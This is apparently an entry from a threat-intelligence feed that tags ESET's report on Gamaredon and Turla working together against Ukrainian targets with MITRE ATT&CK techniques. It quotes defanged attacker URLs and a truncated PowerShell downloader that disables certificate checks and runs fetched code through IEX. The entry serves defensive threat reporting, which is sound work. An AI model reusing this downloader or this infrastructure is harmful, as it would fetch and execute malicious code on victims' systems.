TTPwire Vol. 1 · MITRE ATT&CK·Tagged


ESET WeLiveSecurity

Gamaredon X Turla collab

2025-09-19

ATT&CK techniques detected

4 predictions

T1059.001 PowerShell (99%)
“abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php - https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php - https://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php it is…”

T1059.001 PowerShell (92%)
“…eropaste was caught trying to execute the simple PowerShell script shown in Figure 9. The Base64-encoded string is the following downloader in PowerShell: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; IEX (New-Object Net.WebC…”

T1055.001 Dynamic-link Library Injection (59%)
“is not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar somehow stopped working after the ESET product installation and that they had to restart the implant. Note that we didn’t see Gamaredon downloading Kazuar; it was pr…”

T1105 Ingress Tool Transfer (34%)
“15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload from https://api.telegra[.]ph/getpage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, shown in Figure 8, is similar to the payload described in the first…”

Summary

Notorious APT group Turla collaborates with Gamaredon, both FSB-associated groups, to compromise high-profile targets in Ukraine.